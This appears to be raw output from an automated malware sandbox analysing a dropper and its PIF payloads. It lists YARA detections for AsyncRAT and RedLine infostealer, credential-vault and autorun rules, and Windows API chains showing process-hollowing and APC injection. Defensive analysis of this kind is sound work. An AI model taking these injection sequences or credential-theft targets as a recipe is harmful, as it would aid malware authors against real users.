              Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000004.00000002.3232986846.000000003206C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000007.00000002.2218197846.0000000024381000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000007.00000002.2219281239.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000009.00000002.2320481183.0000000031EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0415CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,0_2_0415CA40
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0415B5FC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0415B5FC
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0415B684 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0415B684
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0415B768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0415B768
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_0411FCD8
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411FD38 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,0_2_0411FD38
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04127E4C CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_04127E4C
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411FB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_0411FB80
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0411FB7E GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_0411FB7E
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040CCA40 WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,5_2_040CCA40
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040CB768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,5_2_040CB768
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_0408FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,5_2_0408FCD8
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_0408FD38 LoadLibraryExA,GetProcAddress,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,5_2_0408FD38
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_04097E4C GetMonitorInfoA,CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,GetMonitorInfoA,NtWriteVirtualMemory,NtWriteVirtualMemory,GetSystemMetrics,SetThreadContext,Wow64SetThreadContext,NtResumeThread,5_2_04097E4C
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_0408FB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,5_2_0408FB80
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040CB684 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,5_2_040CB684
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040C3114 NtdllDefWindowProc_A,5_2_040C3114
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040AF340 NtdllDefWindowProc_A,GetCapture,5_2_040AF340
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040A3E00 GetSubMenu,SaveDC,RestoreDC,NtdllDefWindowProc_A,5_2_040A3E00
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040C38CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,5_2_040C38CC
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040C3990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,5_2_040C3990
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_0408FB7E GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,5_2_0408FB7E
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0415CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,0_2_0415CA40
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\truesight.sysJump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0414C5080_2_0414C508
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_041021600_2_04102160
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0417A1DD0_2_0417A1DD
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04178D180_2_04178D18
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0417AACF0_2_0417AACF
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0417906B0_2_0417906B
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04133E000_2_04133E00
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_041759D60_2_041759D6
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0418BA280_2_0418BA28
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_00408C604_2_00408C60
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_0040DC114_2_0040DC11
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_00407C3F4_2_00407C3F
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_00418CCC4_2_00418CCC
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_00406CA04_2_00406CA0
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004028B04_2_004028B0
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_0041A4BE4_2_0041A4BE
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004182444_2_00418244
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004016504_2_00401650
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_00402F204_2_00402F20
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004193C44_2_004193C4
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004187884_2_00418788
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_00402F894_2_00402F89
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_00402B904_2_00402B90
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_004073A04_2_004073A0
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_31B1FC284_2_31B1FC28
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_31B1F3584_2_31B1F358
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_31B110304_2_31B11030
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_31B110204_2_31B11020
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_31B1F0104_2_31B1F010
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_35BD47704_2_35BD4770
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_35BD1F804_2_35BD1F80
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_2_35BD01B04_2_35BD01B0
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_00408C604_1_00408C60
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_0040DC114_1_0040DC11
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_00407C3F4_1_00407C3F
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_00418CCC4_1_00418CCC
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_00406CA04_1_00406CA0
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_004028B04_1_004028B0
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_0041A4BE4_1_0041A4BE
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_004182444_1_00418244
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_004016504_1_00401650
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_00402F204_1_00402F20
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_004193C44_1_004193C4
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_004187884_1_00418788
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_00402F894_1_00402F89
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_00402B904_1_00402B90
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 4_1_004073A04_1_004073A0
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040BC5085_2_040BC508
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040721605_2_04072160
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040A3E005_2_040A3E00
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_00408C607_2_00408C60
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_0040DC117_2_0040DC11
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_00407C3F7_2_00407C3F
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_00418CCC7_2_00418CCC
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_00406CA07_2_00406CA0
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_004028B07_2_004028B0
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_0041A4BE7_2_0041A4BE
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_004182447_2_00418244
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_004016507_2_00401650
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_00402F207_2_00402F20
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_004193C47_2_004193C4
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_004187887_2_00418788
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_00402F897_2_00402F89
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_00402B907_2_00402B90
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_004073A07_2_004073A0
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_242C10207_2_242C1020
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_2_242C10307_2_242C1030
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_1_00408C607_1_00408C60
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_1_0040DC117_1_0040DC11
              Source: C:\Users\Public\Libraries\vokleakA.pifCode function: 7_1_00407C3F7_1_00407C3F
